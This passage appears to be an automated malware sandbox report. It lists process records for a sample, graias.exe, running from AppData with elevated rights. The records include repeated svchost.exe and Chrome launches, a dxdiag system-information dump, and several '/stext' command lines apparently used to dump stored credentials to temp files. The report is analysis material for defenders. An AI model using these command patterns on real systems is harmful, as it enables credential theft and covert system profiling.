                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                                                                          Imagebase:0xb10000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                          Start time:18:02:01
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                          Start time:18:02:04
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                          Start time:18:02:04
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                          Start time:18:02:09
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                          Start time:18:02:09
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                          Start time:18:02:10
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                          Start time:18:02:12
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                          Start time:18:02:13
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                          Start time:18:02:16
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                          Start time:18:02:16
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                          Start time:18:02:17
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                          Start time:18:02:21
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                          Start time:18:02:21
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                          Start time:18:02:22
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                          Start time:18:02:28
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                          Start time:18:02:28
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                          Start time:18:02:31
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                          Start time:18:02:31
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                          Start time:18:02:31
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                          Start time:18:02:33
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                                                                                                                                                                                                                                          Imagebase:0x5a0000
                                                                                                                                                                                                                                          File size:222'720 bytes
                                                                                                                                                                                                                                          MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                          Start time:18:02:35
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                          Start time:18:02:35
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                          Start time:18:02:39
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                                                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                          Start time:18:02:39
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                                                                                                                                                                                                                                          Imagebase:0x20000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                          Start time:18:02:39
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                                                                                                                                                                                                                                          Imagebase:0x8f0000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                          Start time:18:02:39
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
                                                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                          Start time:18:02:39
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
